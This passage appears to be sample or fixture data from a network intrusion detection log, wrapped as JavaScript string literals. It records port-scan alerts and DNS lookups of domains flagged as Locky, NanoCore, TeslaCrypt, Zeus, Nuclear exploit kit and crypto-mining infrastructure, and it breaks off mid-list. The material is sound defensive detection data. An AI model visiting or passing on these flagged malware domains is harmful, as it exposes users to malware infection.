    '"2021-01-11 02:54:44.000120" r2d2 91.123.157.56 55751,55755,55765,56199,56206,56209,56212,56216,56227,56234,56239,56246 2.200.97.6 80,81,808,3128,3130,8000,8080,8081,8118,8888,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:54:49.677334" r2d2 2.200.110.233 64557 2.200.107.169 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:54:49.678770" r2d2 2.200.107.146 64577 45.175.22.4 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:54:44.000208" r2d2 91.123.157.56 55600,55606,55623,55629,55636,55642,55647,55653,55659,55663,55670,55675 2.200.97.11 80,81,808,3128,3129,3130,8000,8080,8081,8090,9090,9999 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:54:50.452454" r2d2 2.200.110.233 63801 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:54:59.631208" r2d2 2.200.110.232 49289 2.200.107.168 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:54:59.634009" r2d2 2.200.107.146 18981 78.47.109.127 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:54:56.861229" r2d2 178.17.174.14 60432 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:54:52.000505" r2d2 91.123.157.56 62444,62639,62641,62643,62645,62647,62651,62653,62655,62659,62661 2.200.97.17 81,808,3130,8000,8080,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:54:56.861221" r2d2 178.17.174.14 60432 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:54:58.000608" r2d2 91.123.157.56 64467,64469,64471,64479,64481,64483,64485,64487,64489,64493,64494 2.200.96.103 80,81,3128,3129,3130,8000,8080,8081,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:55:42.170864" r2d2 2.200.107.248 35005 8.8.8.8 53 UDP DNS (update).drp.su "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:55:42.170867" r2d2 2.200.107.248 35005 8.8.8.8 53 UDP DNS (update).drp.su "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:55:43.388692" r2d2 2.200.110.232 65333 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:55:43.390205" r2d2 2.200.107.146 26013 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:55:55.000573" r2d2 91.123.157.56 51430,51431,51432,51433,51434,51435,51436,51438,51439,51441,51442,52162,52164,52166,52167,52170,52171,52174,52176,52186,52188,52194,52280,52285,52287,52290,52293,52296,52299,52302,52305,52307,52309,52330,52332,52333,52735,52736,52737,52738,52739,52741,52742,52743,52745,52746,52747,52748,52750,52751,52752,52753,52755,52756,52758,52759,52761,52762,52763,52766,52767,52771,52773,52775,52776,52778,52836,52837,52839,52841,52843,52845,52849,52851,52855,52861,52863,53139,53140,53142,53143,53146,53150,53153,53157,53165,53169,53172,53175,53217,53218,53221,53222,53223,53225,53226,53227,53229,53230,53231,53233,53234,53235,53242,53244,53247,53248,53251,53252,53256,53259,53260,53263,53264,53267,53268,53273,53275,53277,53279,53280,53283,53284,53287,53288,53291,53295,53302,53306,53307,53311,53314,53316,53318,53320,53322,53324,53326,53330,53333,53334,53338,53346,53349,53350,53355,53359,53362,53365,53367,53368,53371,53372,53378,53382,53384,53386,53388,53389,53393,53397,53407,53408,53411,53412,53415,53416,53419,53420,53421,53422,53424,53425,53426,53428,53429,53433,53437,53439,53443,53445,53447,53449,53451,53455,53457,53462,53463,53468,53473,53474,53479,53481,53487,53488,53491,53494,53497,53499,53502,53503,53507,53508,53512,53513,53515,53516,53517,53518,53523,53524,53525,53528,53531,53534,53536,53539,53547,53550,53553,53556,53559,53561,53562,53563,53564,53566,53567,53568,53570,53571,53572,53575,53576,53577,53579,53580,53583,53584,53585,53588,53589,53592,53593,53596,53600,53601,53603,53606,53607,53608,53609,53610,53611,53612,53613,53614,53615,53616,53618,53619,53620,53621,53628,53629,53632,53633,53636,53638,53639,53642,53645,53652,53654,53656,53664,53665,53669,53674,53676,53677,53682,53691,53695,53698,53701,53704,53707,53709,53711,53713,53714,53717,53718,53720,53721,53725,53727,53728,53729,53731,53732,53733,53737,53738,53740,53741,53743,53745,53747,53749,53751,53753,53756,53758,53759,53760,53765,53768,53771,53773,53774,53778,53779,53921,53924,53926,53928,53930,53932,53935,53937,53940,53941,53944,53945,53948,53966,53969,53970,53973,53974,53976,53977,53978,53980,53983,53985,53988,53990,53993,53994,53996,54036,54074,54078,54082,54087,54294,54306,54323,54343,54349,54352,54355,54358,54393,54411,54455,54654,54657,54663,54668,54672,54675,54680,54684,54689,54696,54704,54773,54780,54785,54790,54795,54801,54888,54890,54893,54896,54901 2.200.101.126,2.200.101.157,2.200.101.17,2.200.101.186,2.200.101.208,2.200.101.64,2.200.98.74,2.200.99.100,2.200.99.103,2.200.99.106,2.200.99.109,2.200.99.112,2.200.99.34,2.200.99.37,2.200.99.64,2.200.99.68,2.200.99.70,2.200.99.72,2.200.99.74,2.200.99.76,2.200.99.79,2.200.99.81,2.200.99.84,2.200.99.87,2.200.99.91,2.200.99.92,2.200.99.95,2.200.99.98 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:55:57.580820" r2d2 2.200.110.232 49252 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:55:57.582177" r2d2 2.200.107.146 16180 185.24.64.42 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:55:57.650437" r2d2 2.200.110.232 63513 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:55:57.650923" r2d2 2.200.110.232 49327 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:55:57.651063" r2d2 2.200.110.232 65264 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 02:55:57.651821" r2d2 2.200.107.146 16774 192.43.172.30 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:55:57.652765" r2d2 2.200.107.146 61730 173.201.76.9 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:55:57.670520" r2d2 2.200.110.232 63897 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:55:57.689001" r2d2 2.200.110.233 49338 2.200.107.169 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 02:55:57.671890" r2d2 2.200.107.146 55634 192.52.178.30 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:55:57.695546" r2d2 2.200.110.233 64086 2.200.107.169 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:55:57.704820" r2d2 2.200.110.233 65211 2.200.107.169 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:55:55.000367" r2d2 91.123.157.56 1038,1043,1128,1162,1196,1290,1361,1392,2365,2371,2400,2407,2504,3158,3159,3160,4186,4198,4206,4209,4214,4217,4223,4226,4232,4844,7673,7681,7688,7692,7696,8685,8936,8940,8944,8948,8952,9634,10623,10625,10636,10713,10730,11018,11022,11030,11115,11224,11232,11239,11488,11500,11503,11510,11866,11874,11913,11930,11940,12102,12109,12291,13783,13785,13786,13787,13788,13789,13790,13791,13792,13794,13795,13796,13797,13798,18522,19833,19908,19912,19918,19920,19922,19924,19928,20139,20876,20879,20883,20922,20927,20937,20942,23837,23939,23942,23993,24122,24193,24316,24430,24438,24444,24573,24591,24670,24672,24761,24805,24817,24857,24877,30284,30289,30290,30292,30293,30298,30299,30300,30806,30904,33745,37067,39017,46690,46702,46728,46756,46761,46840,46961,47027,51629,51632,51635,51641,51643,51645,51647,51652,51654,51655,51656,51972,51973,51974,51975,51976,51977,51979,51980,51981,51982,51983,51984,52004,52006,52007,52008,52009,52012,52013,52014,52018,52019,52020,52022,52361,52413,52416,52419,52421,52423,52425,52427,52429,52431,52435,52438,52442,52444,52446,52452,52454,52457,52461,52464,52467,52469,52472,52475,52589,52591,52593,52595,52602,52604,52607,52705,52710,52711,52735,52736,52737,52738,52739,52741,52742,52743,52745,52746,52747,52748,52750,52751,52752,52753,52755,52756,52758,52759,52761,52762,52763,52766,52767,52771,52773,52775,52776,52778,52794,53139,53140,53142,53143,53146,53150,53153,53157,53165,53169,53172,53175,53217,53218,53221,53222,53223,53225,53226,53227,53229,53230,53231,53232,53233,53234,53235,53236,53242,53244,53246,53247,53248,53250,53251,53252,53254,53256,53258,53259,53260,53262,53263,53264,53266,53267,53268,53270,53273,53275,53277,53278,53279,53280,53283,53284,53286,53287,53288,53291,53295,53302,53306,53307,53311,53314,53316,53318,53320,53322,53324,53326,53330,53333,53334,53338,53346,53349,53350,53355,53359,53362,53365,53367,53368,53371,53372,53378,53382,53384,53386,53388,53389,53393,53397,53407,53408,53411,53412,53415,53416,53419,53420,53421,53422,53424,53425,53426,53428,53429,53433,53437,53439,53443,53445,53447,53449,53451,53455,53457,53462,53463,53468,53473,53474,53479,53481,53487,53488,53491,53494,53497,53499,53502,53503,53507,53508,53512,53513,53515,53516,53517,53518,53523,53524,53525,53528,53531,53534,53536,53539,53547,53550,53553,53556,53559,53561,53562,53563,53564,53566,53567,53568,53570,53571,53572,53575,53576,53577,53579,53580,53583,53584,53585,53588,53589,53592,53593,53596,53600,53601,53603,53606,53607,53608,53609,53610,53611,53612,53613,53614,53615,53616,53618,53619,53620,53621,53628,53629,53632,53633,53636,53638,53639,53642,53645,53652,53654,53656,53664,53665,53669,53674,53676,53677,53682,53691,53695,53698,53701,53704,53707,53709,53711,53713,53714,53717,53718,53720,53721,53725,53727,53728,53729,53731,53732,53733,53737,53738,53740,53741,53743,53745,53747,53749,53751,53753,53756,53758,53759,53760,53765,53768,53771,53773,53774,53778,53779,53921,53924,53926,53928,53930,53932,53935,53937,53940,53941,53944,53945,53948,53966,53969,53970,53973,53974,53976,53977,53978,53980,53983,53985,53988,53990,53993,53994,53996,54036,54363,54365,54367,54372,54374,54377,54379,54382,54383,54386,54389,54390,54393,54394,54398,54410,54411,54414,54418,54423,54427,54429,54431,54433,54435,54439,54455,54472,54476,54480,54483,54496,54504,54651,54656,54770,54777,54780,54785,54795,54798,54801,54884,54888,54890,54893,54896,54899,55403,55405,55406,55408,55409,55410,55411,55412,55413,55414,55415,55417,55418,55419,55420,55421,55422,55423,55424,55425,55426,55428,55431,55432,55433,55434,55436,55437,55438,55441,55442,55445,55446,55448,55449,55450,55453,55456,55458,55459,55461,55462,55463,55738,56111,56747,56825,56829,56833,56837,56841,56844,57005,57009,57014,57038,57041,57046,58510,58513,58515,58517,58518,58520,58524,58526,58527,58529,58530,58532,58533,58535,58536,58538,58541,58543,58544,58546,58547,58550,58552,58554,58555,58558,58559,58562,58563,58566,58567,58571,58573,58575,58577,58578,58580,58582,58584,58586,58588,58589,58592,58593,58596,58597,58599,58600,58602,58603,58607,58610,58611,58613,58615,58617,58619,58620,58634,58637,58641,58649,58653,58657,58665,58671,58674,58676,58677,58681,58682,58684,58685,58688,58689,58690,58692,58693,58694,58695,58697,58698,58699,58700,58701,58704,58705,58706,58707,58711,58712,58715,58716,58720,58724,58725,58727,58731,58732,58733,58734,58736,58737,58738,58740,58741,58742,58747,58748,58750,58751,58753,58759,58761,58762,58764,58768,58769,58771,58772,58774,58775,58777,58778,58780,58781,58782,58784,58785,58787,58788,58790,58792,58793,58795,58798,58800,58803,58804,58806,58807,58809,58810,58812,58813,58815,58816,58819,58820,58823,58825,58826,58828,58830,58831,58832,58833,58834,58835,58836,58837,58838,58839,58840,58841,58843,58844,58845,58846,58847,58848,58849,58850,58851,58852,58853,58855,58856,58857,58858,58860,58864,58865,58866,58867,58868,58870,58872,58873,58874,58875,58877,58879,58880,58881,58882,58884,58885,58886,58887,58888,58889,58890,58891,58893,58894,58895,58896,58897,58898,58899,58900,58901,58902,58904,58905,58906,58907,58909,58910,58911,58912,58913,58915,58916,58917,58919,58920,58921,58922,58923,58924,58925,58926,58927,58928,58929,58930,58931,58932,58933,58934,58935,58936,58937,58938,58939,58940,58941,58942,58943,58944,58945,58947,58948,58949,58950,58951,58952,58953,58956,58958,58959,58960,58961,58962,58963,58965,58966,58967,58969,58970,58971,58973,58974,58975,58976,58977,58978,58979,58980,58982,58984,58986,58987,58989,58990,58991,58992,58993,58994,58995,59151,59170,59174,59482,59495,59518,59533,59971,59975,59983,59987,59990,60003,60006,60018,60020,60025,60027,60029,60031,60033,60035,60214,60215,60257,60261,60266,60270,60273,60275,60279,60329,60336,60340,60344,60347,60537,60549,60593,60720,60836,60944,60949,61014,61036,61091,61160,61168,61177,61501,61543,61601,61606,61610,61634,61639,61655,61659,61663,61672,61676,61680,61685,61690,61695,61740,61759,61783,61788,61801,61833,61902,61904,61944,61969,62009,62021,62096,62792,62803,62809,62812,62854,62867,62868,62909,62945,62982,62998,63000,63001,63002,63003,63005,63007,63008,63012,63013,63211,63234,63281,63282,63283,63286,63289,63292,63293,63294,63295,63296,63297,63298,63315,63317,63322,63327,63338,63344,63364,63365,63375,63379,63380,63385,63608,63632,63705,63836,63847,63915,63919,63923,63927,63928,63930,63935,63939,63942,63982,64058,64064,64087,64093,64096,64115,64120,64143,64154,64165,64276,64278,64281,64282,64283,64285,64287,64288,64291,64293,64294,64295,64297,64299,64301,64303,64305,64318,64322,64349,64356,64358,64361,64374,64377,64390,64410,64412,64416,64419,64425,64480,64512,64514,64527,64532,64545,64547,64562,64597,64698,64726,64732,64778,64811,64819,64826,64831,64849,64853,64857,64858,64861,64865,64869,64873,64915,65004,65037,65048,65077,65090,65137,65205,65235,65252,65270,65320,65479 2.200.101.11,2.200.101.121,2.200.101.166,2.200.101.17,2.200.101.170,2.200.101.190,2.200.101.199,2.200.101.201,2.200.101.21,2.200.101.234,2.200.101.239,2.200.101.240,2.200.101.28,2.200.101.36,2.200.101.43,2.200.101.47,2.200.101.50,2.200.101.59,2.200.101.68,2.200.101.72,2.200.101.76,2.200.99.100,2.200.99.102,2.200.99.103,2.200.99.105,2.200.99.106,2.200.99.108,2.200.99.109,2.200.99.111,2.200.99.112,2.200.99.113,2.200.99.114,2.200.99.115,2.200.99.116,2.200.99.117,2.200.99.118,2.200.99.119,2.200.99.120,2.200.99.121,2.200.99.122,2.200.99.123,2.200.99.124,2.200.99.125,2.200.99.126,2.200.99.127,2.200.99.33,2.200.99.34,2.200.99.36,2.200.99.37,2.200.99.64,2.200.99.68,2.200.99.69,2.200.99.70,2.200.99.71,2.200.99.72,2.200.99.73,2.200.99.74,2.200.99.75,2.200.99.76,2.200.99.77,2.200.99.78,2.200.99.79,2.200.99.80,2.200.99.81,2.200.99.82,2.200.99.83,2.200.99.84,2.200.99.85,2.200.99.86,2.200.99.87,2.200.99.88,2.200.99.89,2.200.99.91,2.200.99.92,2.200.99.93,2.200.99.94,2.200.99.95,2.200.99.96,2.200.99.97,2.200.99.98,2.200.99.99 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:55:57.950373" r2d2 2.200.110.232 49171 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:55:57.990715" r2d2 2.200.110.232 65135 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:55:57.990456" r2d2 2.200.110.232 65234 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 02:55:58.820808" r2d2 2.200.110.232 64593 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 02:55:59.371015" r2d2 2.200.110.232 64926 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:55:59.125925" r2d2 2.200.110.232 65255 2.200.107.168 53 UDP DNS (td-username-db4-63-185).wix.com "free web hosting (suspicious)" (static)\n' +
    '"2021-01-11 02:55:59.127393" r2d2 2.200.107.146 11181 198.51.44.3 53 UDP DNS (td-username-db4-63-185).wix.com "free web hosting (suspicious)" (static)\n' +
    '"2021-01-11 02:55:59.614654" r2d2 2.200.110.232 65416 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:55:59.624811" r2d2 2.200.110.232 63669 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:55:59.627000" r2d2 2.200.107.146 32103 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:55:59.915941" r2d2 2.200.105.226 58460 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:55:59.915879" r2d2 2.200.105.226 58460 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:56:00.480796" r2d2 2.200.110.233 63537 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:55:55.000196" r2d2 91.123.157.56 1038,1043,1128,1162,1196,1290,1361,1392,1415,2365,2371,2400,2407,2504,3158,3159,3160,4186,4198,4206,4209,4214,4217,4223,4226,4232,4844,7673,7681,7688,7692,7696,8685,8936,8940,8944,8948,8952,9634,10623,10625,10636,10713,10730,11018,11022,11030,11115,11224,11232,11239,11488,11500,11503,11510,11866,11874,11913,11930,11940,12102,12109,12291,13783,13785,13786,13787,13788,13789,13790,13791,13792,13794,13795,13796,13797,13798,18522,19833,19908,19912,19918,19920,19922,19924,19928,20139,20876,20879,20883,20922,20927,20937,20942,23837,23939,23942,23993,24122,24193,24316,24430,24438,24444,24573,24591,24670,24672,24761,24805,24817,24857,24877,25462,30284,30289,30290,30292,30293,30298,30299,30300,30317,30806,30904,33745,37067,39017,40781,41705,41799,41887,41893,41899,41912,41920,41929,46690,46702,46728,46756,46761,46840,46961,47027,52005,52006,52007,52008,52012,52013,52014,52017,52018,52020,52022,52054,52055,52056,52057,52058,52060,52062,52063,52065,52066,52068,52183,52189,52191,52193,52195,52200,52203,52204,52207,52212,52215,52519,52523,52527,52531,52536,52539,52547,52549,52551,52554,52556,52735,52736,52737,52738,52739,52741,52742,52743,52745,52746,52747,52748,52750,52751,52752,52753,52755,52756,52758,52759,52761,52762,52763,52766,52767,52771,52773,52775,52776,52778,52867,52869,52871,52875,52877,52883,52885,52887,52889,52891,52893,52895,52899,52901,52903,52905,53030,53032,53034,53036,53038,53044,53046,53050,53052,53054,53056,53058,53060,53062,53066,53068,53070,53076,53078,53080,53084,53088,53090,53092,53094,53099,53101,53104,53107,53139,53140,53142,53143,53146,53150,53153,53157,53165,53169,53172,53175,53217,53218,53221,53222,53223,53225,53226,53227,53229,53230,53231,53233,53234,53235,53242,53244,53247,53248,53251,53252,53256,53259,53260,53263,53264,53267,53268,53273,53275,53277,53279,53280,53283,53284,53287,53288,53291,53295,53302,53306,53307,53311,53314,53316,53318,53320,53322,53324,53326,53330,53333,53334,53338,53346,53349,53350,53355,53359,53362,53365,53367,53368,53371,53372,53378,53382,53384,53386,53388,53389,53393,53397,53407,53408,53411,53412,53415,53416,53419,53420,53421,53422,53424,53425,53426,53428,53429,53433,53437,53439,53443,53445,53447,53449,53451,53455,53457,53462,53463,53468,53473,53474,53479,53481,53487,53488,53491,53494,53497,53499,53502,53503,53507,53508,53512,53513,53515,53516,53517,53518,53523,53524,53525,53528,53531,53534,53536,53539,53547,53550,53553,53556,53559,53561,53562,53563,53564,53566,53567,53568,53570,53571,53572,53575,53576,53577,53579,53580,53583,53584,53585,53588,53589,53592,53593,53596,53600,53601,53603,53606,53607,53608,53609,53610,53611,53612,53613,53614,53615,53616,53618,53619,53620,53621,53628,53629,53632,53633,53636,53638,53639,53642,53645,53652,53654,53656,53664,53665,53669,53674,53676,53677,53682,53691,53695,53698,53701,53704,53707,53709,53711,53713,53714,53717,53718,53720,53721,53725,53727,53728,53729,53731,53732,53733,53737,53738,53740,53741,53743,53745,53747,53749,53751,53753,53756,53758,53759,53760,53765,53768,53771,53773,53774,53778,53779,53921,53924,53926,53928,53930,53932,53935,53937,53940,53941,53944,53945,53948,53966,53969,53970,53973,53974,53976,53977,53978,53980,53983,53985,53988,53990,53993,53994,53996,54036,54361,54365,54367,54369,54371,54372,54373,54374,54376,54379,54381,54383,54385,54388,54389,54393,54396,54401,54407,54411,54412,54420,54455,54656,54710,54714,54717,54724,54734,54798,55403,55405,55406,55408,55409,55410,55411,55412,55413,55414,55415,55417,55418,55419,55420,55421,55422,55423,55424,55425,55426,55428,55431,55432,55433,55434,55436,55437,55438,55441,55442,55445,55446,55448,55449,55450,55453,55456,55458,55459,55461,55462,55463,55738,55895,55898,55901,55905,55909,55911,55913,55915,55919,55923,55925,55928,55931,55934,55937,55945,55990,56111,56327,56330,56332,56336,56340,56359,56376,56433,56436,56439,56442,56445,56447,56470,56472,56474,56477,56479,56482,56485,56490,56502,56697,56700,56702,56717,56720,56724,56732,56735,56739,56796,56799,56803,56807,56815,56821,56826,56830,56834,56842,58510,58513,58515,58517,58518,58520,58524,58526,58527,58529,58530,58532,58533,58535,58536,58538,58541,58543,58544,58546,58547,58550,58552,58554,58555,58558,58559,58562,58563,58566,58567,58571,58573,58575,58577,58578,58580,58582,58584,58586,58588,58589,58592,58593,58596,58597,58599,58600,58602,58603,58607,58610,58611,58613,58615,58617,58619,58620,58634,58637,58641,58649,58653,58657,58665,58671,58674,58676,58677,58681,58682,58684,58685,58688,58689,58690,58692,58693,58694,58695,58697,58698,58699,58700,58701,58704,58705,58706,58707,58711,58712,58715,58716,58720,58724,58725,58727,58731,58732,58733,58734,58736,58737,58738,58740,58741,58742,58747,58748,58750,58751,58753,58759,58761,58762,58764,58768,58769,58771,58772,58774,58775,58777,58778,58780,58781,58782,58784,58785,58787,58788,58790,58792,58793,58795,58798,58800,58803,58804,58806,58807,58809,58810,58812,58813,58815,58816,58819,58820,58823,58825,58826,58828,58830,58831,58832,58833,58834,58835,58836,58837,58838,58839,58840,58841,58843,58844,58845,58846,58847,58848,58849,58850,58851,58852,58853,58855,58856,58857,58858,58860,58864,58865,58866,58867,58868,58870,58872,58873,58874,58875,58877,58879,58880,58881,58882,58884,58885,58886,58887,58888,58889,58890,58891,58893,58894,58895,58896,58897,58898,58899,58900,58901,58902,58904,58905,58906,58907,58909,58910,58911,58912,58913,58915,58916,58917,58919,58920,58921,58922,58923,58924,58925,58926,58927,58928,58929,58930,58931,58932,58933,58934,58935,58936,58937,58938,58939,58940,58941,58942,58943,58944,58945,58947,58948,58949,58950,58951,58952,58953,58956,58958,58959,58960,58961,58962,58963,58965,58966,58967,58969,58970,58971,58973,58974,58975,58976,58977,58978,58979,58980,58982,58984,58986,58987,58989,58990,58991,58992,58993,58994,58995,59151,59170,59174,59482,59495,59518,59533,59971,59975,59980,59983,59987,59990,60087,60091,60094,60100,60103,60106,60109,60112,60114,60120,60122,60215,60537,60549,60593,60720,60836,60949,61014,61036,61091,61160,61168,61177,61501,61543,61601,61608,61610,61634,61639,61655,61659,61663,61667,61672,61680,61685,61695,61740,61759,61783,61788,61801,61833,61902,61904,61944,61969,62009,62021,62096,62143,62149,62152,62154,62155,62157,62158,62159,62665,62666,62712,62792,62803,62809,62812,62854,62867,62868,62909,62945,62982,62998,63117,63119,63123,63127,63131,63135,63139,63143,63150,63155,63159,63162,63163,63166,63167,63170,63171,63174,63180,63181,63182,63185,63189,63190,63197,63201,63208,63211,63212,63216,63225,63227,63229,63236,63298,63315,63317,63327,63333,63338,63342,63344,63347,63348,63349,63352,63355,63356,63357,63359,63360,63361,63362,63365,63375,63379,63380,63385,63608,63632,63652,63705,63842,63876,63880,63892,63896,63934,63942,63982,64058,64061,64062,64064,64081,64087,64093,64096,64115,64120,64143,64154,64165,64167,64196,64199,64231,64234,64238,64241,64247,64249,64276,64278,64281,64282,64283,64285,64287,64288,64291,64293,64294,64295,64297,64299,64301,64303,64305,64318,64322,64349,64356,64358,64361,64364,64372,64374,64376,64377,64380,64385,64390,64410,64480,64512,64545,64547,64562,64597,64698,64726,64732,64778,64811,64819,64831,64858,64891,64895,64899,64903,64907,64911,64915,64923,64926,64931,64936,65004,65037,65048,65077,65090,65116,65137,65205,65235,65252,65270,65320,65479 2.200.100.193,2.200.101.111,2.200.101.12,2.200.101.121,2.200.101.13,2.200.101.170,2.200.101.178,2.200.101.180,2.200.101.182,2.200.101.184,2.200.101.195,2.200.101.20,2.200.101.214,2.200.101.225,2.200.101.228,2.200.101.234,2.200.101.241,2.200.101.255,2.200.101.34,2.200.101.36,2.200.101.38,2.200.101.47,2.200.101.62,2.200.101.65,2.200.101.73,2.200.101.75,2.200.101.85,2.200.101.89,2.200.99.100,2.200.99.102,2.200.99.103,2.200.99.105,2.200.99.106,2.200.99.108,2.200.99.109,2.200.99.111,2.200.99.112,2.200.99.113,2.200.99.114,2.200.99.115,2.200.99.116,2.200.99.117,2.200.99.118,2.200.99.119,2.200.99.120,2.200.99.121,2.200.99.122,2.200.99.123,2.200.99.124,2.200.99.125,2.200.99.126,2.200.99.127,2.200.99.33,2.200.99.34,2.200.99.36,2.200.99.37,2.200.99.64,2.200.99.68,2.200.99.69,2.200.99.70,2.200.99.71,2.200.99.72,2.200.99.73,2.200.99.74,2.200.99.75,2.200.99.76,2.200.99.77,2.200.99.78,2.200.99.79,2.200.99.80,2.200.99.81,2.200.99.82,2.200.99.83,2.200.99.84,2.200.99.85,2.200.99.86,2.200.99.87,2.200.99.88,2.200.99.89,2.200.99.91,2.200.99.92,2.200.99.93,2.200.99.94,2.200.99.95,2.200.99.96,2.200.99.97,2.200.99.98,2.200.99.99 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:55:56.000012" r2d2 91.123.157.56 1038,1043,1128,1162,1196,1290,1361,1392,2371,2400,2407,2504,3158,3159,3160,3192,3194,3195,3196,3198,3199,3200,3201,3202,3203,3204,3205,3206,4186,4198,4206,4209,4214,4217,4223,4226,4232,4844,7673,7681,7688,7692,7696,8475,8476,8478,8480,8482,8484,8485,8486,8487,8488,8489,8490,8491,8492,8493,8495,8496,8497,8498,8500,8501,8502,8505,8506,8507,8508,8509,8510,8511,8512,8513,8515,8516,8685,8731,8741,8747,8753,8759,8761,8763,8766,8769,8771,8774,8936,8940,8944,8948,8952,9194,9195,9196,9197,9602,9605,9611,9614,9626,9634,9638,9641,9728,9729,9730,9731,9734,9735,9736,9738,9739,9740,9741,9746,9747,9749,9751,9752,9753,9754,9755,9758,9759,9760,9762,9763,9764,9765,9766,9767,9768,9770,9771,9772,9774,9775,9815,9817,9819,9827,9829,9831,9833,9835,9839,9841,9843,9848,9852,9854,9856,9858,9860,9862,9864,9866,9868,9870,9872,9874,10064,10066,10067,10068,10069,10070,10071,10072,10075,10079,10080,10082,10210,10212,10214,10216,10218,10240,10242,10245,10249,10253,10255,10257,10263,10623,10625,10636,10713,10730,11018,11022,11030,11115,11224,11232,11239,11488,11500,11503,11510,11866,11874,11913,11930,11940,12102,12109,12291,13783,13785,13786,13787,13788,13789,13790,13791,13792,13794,13795,13796,13797,13798,18522,19833,19908,19912,19918,19920,19922,19924,19928,20139,20876,20879,20883,20922,20927,20937,20942,22267,22478,22479,22480,22481,22482,22483,22484,22486,22487,22488,22490,22522,22523,22524,22525,22527,22528,22530,22532,22534,22535,22536,22538,22539,22541,22542,22544,22546,22547,22548,22549,22550,22551,22612,22613,22615,22616,22617,22619,22620,22621,22622,22623,22624,23601,23837,23939,23942,23993,24122,24193,24316,24430,24438,24444,24573,24591,24670,24672,24761,24805,24817,24857,24877,30284,30289,30290,30292,30293,30298,30299,30300,30806,30904,33745,37067,39017,43070,46405,46407,46442,46690,46702,46728,46756,46761,46840,46925,46961,47027,51971,51972,51973,51974,51976,51977,51978,51979,51983,51984,51985,52053,52054,52055,52056,52057,52058,52059,52060,52061,52062,52063,